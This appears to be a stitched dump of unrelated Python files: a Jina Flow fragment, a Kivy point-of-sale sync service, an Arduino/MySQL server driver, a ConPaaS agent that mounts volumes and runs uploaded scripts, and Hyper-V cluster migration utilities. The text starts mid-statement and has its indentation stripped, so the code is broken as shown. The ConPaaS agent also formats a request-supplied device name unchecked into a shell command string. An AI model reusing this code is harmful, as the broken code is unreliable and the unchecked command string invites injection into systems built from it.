f'Docker compose file has been created under [b]{output_path}[/b]. You can use it by running [b]{command}[/b]'
)
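    # Usage sketch for `to_docker_compose_yaml()` (file and network names are examples):
    #
    #   f = Flow().add(name='encoder', uses='docker://my-encoder:latest')
    #   f.to_docker_compose_yaml(output_path='flow-compose.yml', network_name='jina-net')
    #   # then: docker-compose -f flow-compose.yml up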
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
main.py
|
# -*- coding: utf-8 -*-
# @Author: Manuel Rodriguez <valle>
# @Date: 01-Mar-2018
# @Email: valle.mrv@gmail.com
# @Last modified by: valle
# @Last modified time: 13-Mar-2018
# @License: Apache license vesion 2.0
import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(ROOT_DIR)
sys.path.insert(0, os.path.join(ROOT_DIR, "valle_libs"))
sys.path.insert(0, os.path.join(ROOT_DIR, "tpv"))
from time import sleep
from kivy.lib import osc
from valle_libs.valleorm.qson import *
from models.db import *
from datetime import datetime, timedelta
from kivy.storage.jsonstore import JsonStore
from kivy.core import Logger
from config import config
import websocket
import threading
import time
import json
url_db = os.path.join("../db", "sync.json")
db = JsonStore(url_db)
finalizar = False
stop = threading.Event()
if not os.path.isfile("run.block"):
f = open("run.block", "w")
f.close()
class SyncVentasSender(QSonSender):
db_name = "ventas"
#url = config.URL_SERVER+"/simpleapi/"
url = "http://localhost:8000/simpleapi/"
def save_date_db(**args):
global db
text_hora_pedidos = args["pedidos"] if "pedidos" in args else db.get("db")["pedidos"]
text_hora_lineas = args["lineas"] if "lineas" in args else db.get("db")["lineas"]
text_hora_clientes =args["clientes"] if "clientes" in args else db.get("db")["clientes"]
    text_hora_dir = args["dir"] if "dir" in args else db.get("db")["dir"]
db.put("db", pedidos=text_hora_pedidos, lineas=text_hora_lineas,
clientes=text_hora_clientes, dir=text_hora_dir)
def on_success(obj, result):
if result["success"] == True:
if "add" in result:
text_hora_get = db.get("db")["date_get"]
db.put("db", date=str(datetime.now()), date_get=text_hora_get)
if "arqueos" in result["add"]:
borrar_reg()
if "get" in result:
text_hora = db.get("db")["date"]
db.put("db", date_get=str(datetime.now()), date=text_hora)
for s in result["get"]["pedidos"]:
p = Pedidos(**s)
p.estado = p.estado + "_SN"
p.save()
for c in s["clientes"]:
cliente = Clientes(**c)
cliente.save()
for d in c["direcciones"]:
direccion = Direcciones(**d)
direccion.save()
for l in s["lineaspedido"]:
linea = LineasPedido(**l)
linea.save()
p.lineaspedido_set.add(linea)
def sync_pedidos_send(**condition):
ps = Pedidos.filter(**condition)
qsons = []
for p in ps:
p.estado = p.estado + "_SN"
qson = QSon("Pedidos", reg=p.toDICT())
qsons.append(qson)
for l in p.lineaspedido_set.get():
qson_child = QSon("LineasPedido", reg=l.toDICT())
qson.append_child(qson_child)
for c in p.clientes_set.get():
qson_child = QSon("Clientes", reg=c.toDICT())
qson.append_child(qson_child)
for d in c.direcciones_set.get():
qson_dir = QSon("Direcciones", reg=d.toDICT())
qson_child.append_child(qson_dir)
qsonsender = SyncVentasSender()
if len(qsons) > 0:
qsonsender.save(*qsons)
return qsonsender
def sync_arqueos_send(**condition):
ps = Arqueos.filter()
qsons = []
for p in ps:
qson = QSon("Arqueos", reg=p.toDICT())
qsons.append(qson)
for l in p.conteo.get():
qson_child = QSon("Conteo", reg=l.toDICT())
qson.append_child(qson_child)
for c in p.gastos.get():
qson_child = QSon("Gastos", reg=c.toDICT())
qson.append_child(qson_child)
for d in p.pedidosextra.get():
qson_dir = QSon("PedidosExtra", reg=d.toDICT())
qson.append_child(qson_dir)
for d in p.pedidos.get():
qson_dir = QSon("Pedidos", reg=d.toDICT())
qson.append_child(qson_dir)
if len(qsons) > 0:
qsonsender = SyncVentasSender()
qsonsender.save(*qsons)
qsonsender.send_data(on_success)
def sync_clientes_send(**condition):
clientes = Clientes.filter(**condition)
qsons = []
for c in clientes:
qson = QSon("Clientes", reg=c.toDICT())
qsons.append(qson)
for d in c.direcciones_set.get():
qson_dir = QSon("Direcciones", reg=d.toDICT())
qson.append_child(qson_dir)
if len(qsons) > 0:
qsonsender = SyncVentasSender()
qsonsender.save(*qsons)
qsonsender.send_data(on_success)
def borrar_reg():
for p in Arqueos.filter():
p.delete()
for d in Pedidos.filter():
d.delete()
for p in PedidosExtra.filter():
p.delete()
for p in Conteo.filter():
p.delete()
for p in Gastos.filter():
p.delete()
def thread_load():
global db
while True:
try:
if stop.is_set():
if os.path.isfile("run.block"):
os.unlink("run.block")
return
if "db" in db:
text_hora_pedidos = db.get("db")["pedidos"]
text_hora_lineas = db.get("db")["lineas"]
text_hora_clientes = db.get("db")["clientes"]
text_hora_dir = db.get("db")["dir"]
else:
text_hora_pedidos = str(datetime.now()-timedelta(hours=12))
text_hora_lineas = str(datetime.now()-timedelta(hours=12))
text_hora_clientes = str(datetime.now()-timedelta(hours=12))
text_hora_dir = str(datetime.now()-timedelta(hours=12))
                save_date_db(pedidos=text_hora_pedidos,
                             lineas=text_hora_lineas, clientes=text_hora_clientes,
                             dir=text_hora_dir)
'''
            # Send the pedidos (orders) modified in the tpv
            #query = "modify > '%s'" % text_hora
            #qsonsender = sync_pedidos_send(query=query + "AND estado NOT LIKE '%_SN%'")
            # Request the pedidos modified outside the tpv
qsonsender = QSonSender()
qsons = []
qson = QSon("Pedidos", modify__gt=text_hora)
qson.add_exclude(estado="AR_")
qsons.append(qson)
qsons.append(QSon("LineasPedido"))
qsons.append(QSon("Clientes"))
qsons.append(QSon("Direcciones"))
qsonsender.filter(*qsons)
qsonsender.send_data(on_success)
'''
sleep(1)
except Exception as e:
Logger.error("[ERROR ] %s" %e)
sleep(1)
def sync_service(message, *args):
global finalizar
if message[2] == "finalizar":
finalizar = True
elif message[2] == "sync":
qsonsender = QSonSender()
qsonsender.send(on_success, message[3])
elif message[2] == "sync_arqueo":
sync_arqueos_send()
Logger.debug("got a message! %s" % message[2])
if __name__ == '__main__':
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ROOT_DIR = os.path.dirname(BASE_DIR)
osc.init()
oscid = osc.listen(ipAddr='127.0.0.1', port=config.PORT_SERVICE)
osc.bind(oscid, sync_service, '/sync_service')
thread = threading.Thread(target=thread_load)
thread.start()
while not finalizar:
osc.readQueue(oscid)
sleep(.1)
stop.set()
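# Rough sketch of how another process could drive this service over OSC (the exact
# kivy.lib.osc sendMsg signature may vary between Kivy versions; sync_service() reads
# message[2] as the command and message[3] as an optional payload):
#
#   from kivy.lib import osc
#   osc.init()
#   osc.sendMsg('/sync_service', ['sync_arqueo'], ipAddr='127.0.0.1', port=config.PORT_SERVICE)
#   osc.sendMsg('/sync_service', ['finalizar'], ipAddr='127.0.0.1', port=config.PORT_SERVICE)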
|
serverDriver.py
|
import threading
import arduinoConnection
import mysqlSetup
import time
if __name__ == "__main__":
# Run setup once
mysqlSetup.mysqlinitsetup()
# creating thread
t1 = threading.Thread(target=arduinoConnection.arduinoEngine)
t1.daemon = True
t1.start()
# keep daemon threads alive
while True:
time.sleep(1)
|
agent.py
|
"""
Copyright (c) 2010-2015, Contrail consortium.
All rights reserved.
Redistribution and use in source and binary forms,
with or without modification, are permitted provided
that the following conditions are met:
1. Redistributions of source code must retain the
above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce
the above copyright notice, this list of
conditions and the following disclaimer in the
documentation and/or other materials provided
with the distribution.
3. Neither the name of the Contrail consortium nor the
names of its contributors may be used to endorse
or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
import re
import os
import time
import signal
from threading import Thread
from subprocess import Popen, PIPE
from os.path import exists, devnull, join, lexists
from shutil import rmtree
import pickle
import zipfile
import tarfile
import tempfile
import simplejson
from conpaas.core.expose import expose
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse,\
FileUploadField
from conpaas.core.agent import BaseAgent, AgentException
from conpaas.core import git
from conpaas.core.misc import run_cmd
from conpaas.core.misc import check_arguments, is_in_list, is_not_in_list,\
is_list, is_non_empty_list, is_list_dict, is_list_dict2, is_string,\
is_int, is_pos_nul_int, is_pos_int, is_dict, is_dict2, is_bool,\
is_uploaded_file
class GenericAgent(BaseAgent):
def __init__(self, config_parser, **kwargs):
"""Initialize Generic Agent.
'config_parser' represents the agent config file.
**kwargs holds anything that can't be sent in config_parser.
"""
BaseAgent.__init__(self, config_parser)
self.SERVICE_ID = config_parser.get('agent', 'SERVICE_ID')
self.GENERIC_DIR = config_parser.get('agent', 'CONPAAS_HOME')
self.VAR_CACHE = config_parser.get('agent', 'VAR_CACHE')
self.CODE_DIR = join(self.VAR_CACHE, 'bin')
self.VOLUME_DIR = '/media'
self.env = {}
self.processes = {}
@expose('POST')
def init_agent(self, kwargs):
"""Set the environment variables"""
exp_params = [('agents_info', is_string),
('ip', is_string)]
try:
agents_info, agent_ip = check_arguments(exp_params, kwargs)
agents_info = simplejson.loads(agents_info)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
self.logger.info('Setting agent environment')
target_dir = self.VAR_CACHE
with open(join(target_dir, 'agents.json'), 'w') as outfile:
simplejson.dump(agents_info, outfile)
agent_role = [i['role'] for i in agents_info if i['ip'] == agent_ip][0]
master_ip = [i['ip'] for i in agents_info if i['role'] == 'master'][0]
self.env.update({'MY_IP':agent_ip})
self.env.update({'MY_ROLE':agent_role})
self.env.update({'MASTER_IP':master_ip})
self.logger.info('Agent initialized')
return HttpJsonResponse()
@expose('UPLOAD')
def update_code(self, kwargs):
valid_filetypes = [ 'zip', 'tar', 'git' ]
exp_params = [('filetype', is_in_list(valid_filetypes)),
('codeVersionId', is_string),
('file', is_uploaded_file, None),
('revision', is_string, '')]
try:
filetype, codeVersionId, file, revision = check_arguments(exp_params, kwargs)
if filetype != 'git' and not file:
raise Exception("The '%s' filetype requires an uploaded file" % filetype)
elif filetype == 'git' and not revision:
raise Exception("The 'git' filetype requires the 'revision' parameter")
except Exception as ex:
return HttpErrorResponse("%s" % ex)
self.logger.info("Updating code to version '%s'" % codeVersionId)
if filetype == 'zip':
source = zipfile.ZipFile(file.file, 'r')
elif filetype == 'tar':
source = tarfile.open(fileobj=file.file)
elif filetype == 'git':
source = git.DEFAULT_CODE_REPO
# kill all scripts that may still be running
if self.processes:
self._kill_all_processes()
self.processes = {}
target_dir = self.CODE_DIR
if exists(target_dir):
rmtree(target_dir)
if filetype == 'git':
subdir = str(self.SERVICE_ID)
self.logger.debug("git_enable_revision('%s', '%s', '%s', '%s')" %
(target_dir, source, revision, subdir))
git.git_enable_revision(target_dir, source, revision, subdir)
else:
source.extractall(target_dir)
self.logger.info("Code updated, executing the 'init' command")
# every time a new code tarball is activated, execute the init.sh script
self._execute_script('init')
return HttpJsonResponse()
def check_volume_name(self, vol_name):
        if not re.compile('^[A-Za-z0-9_-]+$').match(vol_name):
raise Exception('Volume name contains invalid characters')
@expose('POST')
def mount_volume(self, kwargs):
"""Mount a volume to a Generic node."""
exp_params = [('dev_name', is_string),
('vol_name', is_string)]
try:
dev_name, vol_name = check_arguments(exp_params, kwargs)
dev_name = "/dev/%s" % dev_name
self.check_volume_name(vol_name)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
self.logger.info("Mount operation starting up for volume '%s' on '%s'"
% (vol_name, dev_name))
try:
mount_point = join(self.VOLUME_DIR, vol_name)
self._mount(dev_name, mount_point, True)
except Exception as e:
self.logger.exception("Failed to mount volume '%s'" % vol_name)
return HttpErrorResponse('Failed to mount volume: ' + e.message)
self.logger.info('Mount operation completed')
return HttpJsonResponse()
def _check_dev_is_attached(self, dev_name):
# if the device file does not exist, the volume is definitely not
# attached yet
if not lexists(dev_name):
return False
# force the kernel to re-read the partition table
# this allows reusing the device name after a volume was detached
run_cmd('sfdisk -R %s' % dev_name)
# check if the device appears in the partitions list
short_dev_name = dev_name.split('/')[2]
output, _ = run_cmd('cat /proc/partitions')
return short_dev_name in output
def _mount(self, dev_name, mount_point, mkfs):
devnull_fd = open(devnull, 'w')
# waiting for our block device to be available
dev_found = False
dev_prefix = dev_name.split('/')[2][:-1]
for attempt in range(1, 11):
self.logger.info("Generic node waiting for block device '%s'" % dev_name)
if self._check_dev_is_attached(dev_name):
dev_found = True
break
else:
# On EC2 the device name gets changed
# from /dev/sd[a-z] to /dev/xvd[a-z]
if self._check_dev_is_attached(dev_name.replace(dev_prefix, 'xvd')):
dev_found = True
dev_name = dev_name.replace(dev_prefix, 'xvd')
self.logger.info("Block device is renamed to '%s'" % dev_name)
break
time.sleep(10)
# create mount point
mkdir_cmd = "mkdir -p %s" % mount_point
run_cmd(mkdir_cmd)
if dev_found:
self.logger.info("Generic node has now access to '%s'" % dev_name)
# prepare block device
if mkfs:
self.logger.info("Creating new file system on '%s'" % dev_name)
prepare_args = ['mkfs.ext4', '-q', '-m0', dev_name]
proc = Popen(prepare_args, stdin=PIPE, stdout=devnull_fd,
stderr=devnull_fd, close_fds=True)
proc.communicate(input="y") # answer interactive question with y
if proc.wait() != 0:
self.logger.critical('Failed to prepare storage device:(code=%d)' %
proc.returncode)
else:
self.logger.info('File system created successfully')
else:
self.logger.info(
"Not creating a new file system on '%s'" % dev_name)
time.sleep(10)
# mount
mount_args = ['mount', dev_name, mount_point]
mount_cmd = ' '.join(mount_args)
self.logger.debug("Running command '%s'" % mount_cmd)
_, err = run_cmd(mount_cmd)
if err:
self.logger.critical('Failed to mount storage device: %s' % err)
else:
self.logger.info("Generic node has prepared and mounted '%s'"
% mount_point)
else:
self.logger.critical("Block device '%s' unavailable" % dev_name)
@expose('POST')
def unmount_volume(self, kwargs):
"""Unmount a volume to a Generic node."""
exp_params = [('vol_name', is_string)]
try:
vol_name = check_arguments(exp_params, kwargs)
self.check_volume_name(vol_name)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
self.logger.info("Unmount operation starting up for volume '%s'"
% vol_name)
try:
self._unmount(vol_name)
except Exception as e:
self.logger.exception("Failed to unmount volume '%s'" % vol_name)
return HttpErrorResponse('Failed to unmount volume: ' + e.message)
self.logger.info('Unmount operation completed')
return HttpJsonResponse()
def _unmount(self, vol_name):
mount_point = join(self.VOLUME_DIR, vol_name)
# kill all processes still using the volume
fuser_args = ['fuser', '-km', mount_point]
fuser_cmd = ' '.join(fuser_args)
self.logger.debug("Running command '%s'" % fuser_cmd)
run_cmd(fuser_cmd)
# unmount
unmount_args = ['umount', mount_point]
unmount_cmd = ' '.join(unmount_args)
self.logger.debug("Running command '%s'" % unmount_cmd)
_, err = run_cmd(unmount_cmd)
if err:
self.logger.critical('Failed to unmount storage device: %s' % err)
else:
self.logger.info("Generic node has succesfully unmounted '%s'"
% mount_point)
@expose('POST')
def execute_script(self, kwargs):
valid_commands = [ 'notify', 'run', 'interrupt', 'cleanup' ]
exp_params = [('command', is_in_list(valid_commands)),
('parameters', is_string, ''),
('agents_info', is_string)]
try:
command, parameters, agents_info = check_arguments(exp_params, kwargs)
agents_info = simplejson.loads(agents_info)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
if command == 'notify':
self.logger.info("Executing the '%s' command" % command)
else:
self.logger.info("Executing the '%s' command with parameters '%s'"
% (command, parameters))
target_dir = self.VAR_CACHE
with open(join(target_dir, 'agents.json'), 'w') as outfile:
simplejson.dump(agents_info, outfile)
if command == 'interrupt':
# if no script is running, do nothing
if not self._are_scripts_running():
self.logger.info("No scripts are currently running")
# if interrupt is already running, kill all processes
elif self._get_script_status('interrupt') == 'RUNNING':
self.logger.info("Script 'interrupt.sh' is already running")
self._kill_all_processes()
# execute the script and afterwards kill all processes
else:
Thread(target=self._do_interrupt, args=[parameters]).start()
else:
# if scripts are already running, do nothing
if self._are_scripts_running():
self.logger.info("Scripts are already running")
# execute the script
else:
self._execute_script(command, parameters)
return HttpJsonResponse()
def _do_interrupt(self, parameters):
# execute interrupt.sh
self._execute_script('interrupt', parameters)
# wait for it to finish execution
process = self.processes['interrupt']
if process is not None:
process.wait()
# kill all processes
self._kill_all_processes()
def _execute_script(self, command, parameters=''):
script_name = '%s.sh' % command
script_path = join(self.CODE_DIR, script_name)
if not exists(script_path):
self.logger.critical("Script '%s' does not exist in the active code tarball"
% script_name)
return
start_args = [ "bash", script_path ] + parameters.split()
self.processes[command] = Popen(start_args, cwd=self.GENERIC_DIR,
env=self.env, close_fds=True, preexec_fn=os.setsid)
self.logger.info("Script '%s' is running" % script_name)
def _kill_all_processes(self):
self.logger.info("Killing all running processes")
for process in self.processes.values():
if process is not None and process.poll() is None:
try:
pgrp = process.pid
self.logger.debug("Killing process group %s" % pgrp)
os.killpg(pgrp, signal.SIGTERM)
except Exception as e:
                    self.logger.critical('Failed to kill process group %s: %s' % (pgrp, e))
def _are_scripts_running(self):
for command in ( 'init', 'notify', 'run', 'interrupt', 'cleanup' ):
if self._get_script_status(command) == 'RUNNING':
return True
return False
@expose('GET')
def get_script_status(self, kwargs):
try:
exp_params = []
check_arguments(exp_params, kwargs)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
scripts = {}
for command in ( 'init', 'notify', 'run', 'interrupt', 'cleanup' ):
script_name = "%s.sh" % command
scripts[script_name] = self._get_script_status(command)
return HttpJsonResponse({ 'scripts' : scripts })
def _get_script_status(self, command):
if command not in self.processes or self.processes[command] is None:
return "NEVER STARTED"
returncode = self.processes[command].poll()
if returncode is not None:
return "STOPPED (return code %s)" % returncode
else:
return "RUNNING"
|
clusterutils.py
|
# Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VM related operations on Hyper-V Clusters.
"""
import ctypes
import re
import sys
import threading
import time
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import excutils
from six.moves import queue
from os_win._i18n import _
from os_win import _utils
from os_win import constants
from os_win import exceptions
from os_win.utils import baseutils
from os_win.utils.compute import _clusapi_utils
from os_win.utils.winapi import constants as w_const
from os_win.utils.winapi.libs import clusapi as clusapi_def
from os_win.utils.winapi import wintypes
LOG = logging.getLogger(__name__)
class ClusterUtils(baseutils.BaseUtils):
_MSCLUSTER_NODE = 'MSCluster_Node'
_MSCLUSTER_RES = 'MSCluster_Resource'
_VM_BASE_NAME = 'Virtual Machine %s'
_VM_TYPE = 'Virtual Machine'
_VM_GROUP_TYPE = 111
_MS_CLUSTER_NAMESPACE = '//%s/root/MSCluster'
_LIVE_MIGRATION_TYPE = 4
_IGNORE_LOCKED = 1
_DESTROY_GROUP = 1
_FAILBACK_TRUE = 1
_FAILBACK_WINDOW_MIN = 0
_FAILBACK_WINDOW_MAX = 23
_WMI_EVENT_TIMEOUT_MS = 100
_WMI_EVENT_CHECK_INTERVAL = 2
def __init__(self, host='.'):
self._instance_name_regex = re.compile('Virtual Machine (.*)')
self._clusapi_utils = _clusapi_utils.ClusApiUtils()
if sys.platform == 'win32':
self._init_hyperv_conn(host)
self._watcher = self._get_failover_watcher()
def _init_hyperv_conn(self, host):
try:
self._conn_cluster = self._get_wmi_conn(
self._MS_CLUSTER_NAMESPACE % host)
self._cluster = self._conn_cluster.MSCluster_Cluster()[0]
# extract this node name from cluster's path
path = self._cluster.path_()
self._this_node = re.search(r'\\\\(.*)\\root', path,
re.IGNORECASE).group(1)
except AttributeError:
raise exceptions.HyperVClusterException(
_("Could not initialize cluster wmi connection."))
def _get_failover_watcher(self):
raw_query = ("SELECT * FROM __InstanceModificationEvent "
"WITHIN %(wmi_check_interv)s WHERE TargetInstance ISA "
"'%(cluster_res)s' AND "
"TargetInstance.Type='%(cluster_res_type)s' AND "
"TargetInstance.OwnerNode != PreviousInstance.OwnerNode" %
{'wmi_check_interv': self._WMI_EVENT_CHECK_INTERVAL,
'cluster_res': self._MSCLUSTER_RES,
'cluster_res_type': self._VM_TYPE})
return self._conn_cluster.watch_for(raw_wql=raw_query)
def check_cluster_state(self):
if len(self._get_cluster_nodes()) < 1:
raise exceptions.HyperVClusterException(
_("Not enough cluster nodes."))
def get_node_name(self):
return self._this_node
def _get_cluster_nodes(self):
cluster_assoc = self._conn_cluster.MSCluster_ClusterToNode(
Antecedent=self._cluster.path_())
return [x.Dependent for x in cluster_assoc]
def _get_vm_groups(self):
assocs = self._conn_cluster.MSCluster_ClusterToResourceGroup(
GroupComponent=self._cluster.path_())
resources = [a.PartComponent for a in assocs]
return (r for r in resources if
hasattr(r, 'GroupType') and
r.GroupType == self._VM_GROUP_TYPE)
def _lookup_vm_group_check(self, vm_name):
vm = self._lookup_vm_group(vm_name)
if not vm:
raise exceptions.HyperVVMNotFoundException(vm_name=vm_name)
return vm
def _lookup_vm_group(self, vm_name):
return self._lookup_res(self._conn_cluster.MSCluster_ResourceGroup,
vm_name)
def _lookup_vm_check(self, vm_name):
vm = self._lookup_vm(vm_name)
if not vm:
raise exceptions.HyperVVMNotFoundException(vm_name=vm_name)
return vm
def _lookup_vm(self, vm_name):
vm_name = self._VM_BASE_NAME % vm_name
return self._lookup_res(self._conn_cluster.MSCluster_Resource, vm_name)
def _lookup_res(self, resource_source, res_name):
res = resource_source(Name=res_name)
n = len(res)
if n == 0:
return None
elif n > 1:
raise exceptions.HyperVClusterException(
_('Duplicate resource name %s found.') % res_name)
else:
return res[0]
def get_cluster_node_names(self):
nodes = self._get_cluster_nodes()
return [n.Name for n in nodes]
def get_vm_host(self, vm_name):
return self._lookup_vm_group_check(vm_name).OwnerNode
def list_instances(self):
return [r.Name for r in self._get_vm_groups()]
def list_instance_uuids(self):
return [r.Id for r in self._get_vm_groups()]
def add_vm_to_cluster(self, vm_name):
LOG.debug("Add vm to cluster called for vm %s" % vm_name)
self._cluster.AddVirtualMachine(vm_name)
vm_group = self._lookup_vm_group_check(vm_name)
vm_group.PersistentState = True
vm_group.AutoFailbackType = self._FAILBACK_TRUE
# set the earliest and latest time that the group can be moved
# back to its preferred node. The unit is in hours.
vm_group.FailbackWindowStart = self._FAILBACK_WINDOW_MIN
vm_group.FailbackWindowEnd = self._FAILBACK_WINDOW_MAX
vm_group.put()
def bring_online(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vm.BringOnline()
def take_offline(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vm.TakeOffline()
def delete(self, vm_name):
vm = self._lookup_vm_group_check(vm_name)
vm.DestroyGroup(self._DESTROY_GROUP)
def vm_exists(self, vm_name):
return self._lookup_vm(vm_name) is not None
def live_migrate_vm(self, vm_name, new_host, timeout=None):
self._migrate_vm(vm_name, new_host, self._LIVE_MIGRATION_TYPE,
constants.CLUSTER_GROUP_ONLINE,
timeout)
def _migrate_vm(self, vm_name, new_host, migration_type,
exp_state_after_migr, timeout):
syntax = w_const.CLUSPROP_SYNTAX_LIST_VALUE_DWORD
migr_type = wintypes.DWORD(migration_type)
prop_entries = [
self._clusapi_utils.get_property_list_entry(
w_const.CLUS_RESTYPE_NAME_VM, syntax, migr_type),
self._clusapi_utils.get_property_list_entry(
w_const.CLUS_RESTYPE_NAME_VM_CONFIG, syntax, migr_type)
]
prop_list = self._clusapi_utils.get_property_list(prop_entries)
flags = (
w_const.CLUSAPI_GROUP_MOVE_RETURN_TO_SOURCE_NODE_ON_ERROR |
w_const.CLUSAPI_GROUP_MOVE_QUEUE_ENABLED |
w_const.CLUSAPI_GROUP_MOVE_HIGH_PRIORITY_START)
cluster_handle = None
group_handle = None
dest_node_handle = None
try:
cluster_handle = self._clusapi_utils.open_cluster()
group_handle = self._clusapi_utils.open_cluster_group(
cluster_handle, vm_name)
dest_node_handle = self._clusapi_utils.open_cluster_node(
cluster_handle, new_host)
with _ClusterGroupStateChangeListener(cluster_handle,
vm_name) as listener:
self._clusapi_utils.move_cluster_group(group_handle,
dest_node_handle,
flags,
prop_list)
try:
self._wait_for_cluster_group_migration(
listener,
vm_name,
group_handle,
exp_state_after_migr,
timeout)
except exceptions.ClusterGroupMigrationTimeOut:
with excutils.save_and_reraise_exception() as ctxt:
self._cancel_cluster_group_migration(
listener, vm_name, group_handle,
exp_state_after_migr, timeout)
# This is rather unlikely to happen but we're
                        # covering it anyway.
try:
self._validate_migration(group_handle,
vm_name,
exp_state_after_migr,
new_host)
LOG.warning(
'Cluster group migration completed '
'successfully after cancel attempt. '
'Suppressing timeout exception.')
ctxt.reraise = False
except exceptions.ClusterGroupMigrationFailed:
pass
else:
self._validate_migration(group_handle,
vm_name,
exp_state_after_migr,
new_host)
finally:
if group_handle:
self._clusapi_utils.close_cluster_group(group_handle)
if dest_node_handle:
self._clusapi_utils.close_cluster_node(dest_node_handle)
if cluster_handle:
self._clusapi_utils.close_cluster(cluster_handle)
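# Usage sketch (hypothetical instance and node names; assumes the VM was
# already added to the cluster):
#
#   cluster_utils.live_migrate_vm('instance-00000001', 'compute-node-2',
#                                 timeout=300)
#
# The call blocks until the cluster group reaches the expected online state
# on the destination node, raising ClusterGroupMigrationTimeOut (after
# attempting to cancel the move) if the timeout is exceeded.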
def _validate_migration(self, group_handle, group_name,
expected_state, expected_node):
state_info = self._clusapi_utils.get_cluster_group_state(group_handle)
owner_node = state_info['owner_node']
group_state = state_info['state']
if (expected_state != group_state or
expected_node.lower() != owner_node.lower()):
raise exceptions.ClusterGroupMigrationFailed(
group_name=group_name,
expected_state=expected_state,
expected_node=expected_node,
group_state=group_state,
owner_node=owner_node)
def cancel_cluster_group_migration(self, group_name, expected_state,
timeout=None):
cluster_handle = None
group_handle = None
try:
cluster_handle = self._clusapi_utils.open_cluster()
group_handle = self._clusapi_utils.open_cluster_group(
cluster_handle, group_name)
with _ClusterGroupStateChangeListener(cluster_handle,
group_name) as listener:
self._cancel_cluster_group_migration(
listener, group_name, group_handle,
expected_state, timeout)
finally:
if group_handle:
self._clusapi_utils.close_cluster_group(group_handle)
if cluster_handle:
self._clusapi_utils.close_cluster(cluster_handle)
def _cancel_cluster_group_migration(self, event_listener,
group_name, group_handle,
expected_state,
timeout=None):
LOG.info("Canceling cluster group '%s' migration", group_name)
try:
cancel_finished = (
self._clusapi_utils.cancel_cluster_group_operation(
group_handle))
except exceptions.Win32Exception as ex:
group_state_info = self._get_cluster_group_state(group_handle)
migration_pending = self._is_migration_pending(
group_state_info['state'],
group_state_info['status_info'],
expected_state)
if (ex.error_code == w_const.ERROR_INVALID_STATE and
not migration_pending):
LOG.debug('Ignoring group migration cancel error. '
'No migration is pending.')
cancel_finished = True
else:
raise
if not cancel_finished:
LOG.debug("Waiting for group migration to be canceled.")
try:
self._wait_for_cluster_group_migration(
event_listener, group_name, group_handle,
expected_state,
timeout=timeout)
except Exception:
LOG.exception("Failed to cancel cluster group migration.")
raise exceptions.JobTerminateFailed()
LOG.info("Cluster group migration canceled.")
def _is_migration_queued(self, group_status_info):
return bool(
group_status_info &
w_const.CLUSGRP_STATUS_WAITING_IN_QUEUE_FOR_MOVE)
def _is_migration_pending(self, group_state, group_status_info,
expected_state):
migration_pending = (
group_state != expected_state or
self._is_migration_queued(group_status_info))
return migration_pending
def _wait_for_cluster_group_migration(self, event_listener,
group_name, group_handle,
expected_state,
timeout=None):
time_start = time.time()
time_left = timeout if timeout else 'undefined'
group_state_info = self._get_cluster_group_state(group_handle)
group_state = group_state_info['state']
group_status_info = group_state_info['status_info']
migration_pending = self._is_migration_pending(
group_state,
group_status_info,
expected_state)
if not migration_pending:
return
while not timeout or time_left > 0:
time_elapsed = time.time() - time_start
time_left = timeout - time_elapsed if timeout else 'undefined'
LOG.debug("Waiting for cluster group '%(group_name)s' "
"migration to finish. "
"Time left: %(time_left)s.",
dict(group_name=group_name,
time_left=time_left))
try:
event = event_listener.get(time_left if timeout else None)
except queue.Empty:
break
group_state = event.get('state', group_state)
group_status_info = event.get('status_info', group_status_info)
migration_pending = self._is_migration_pending(group_state,
group_status_info,
expected_state)
if not migration_pending:
return
LOG.error("Cluster group migration timed out.")
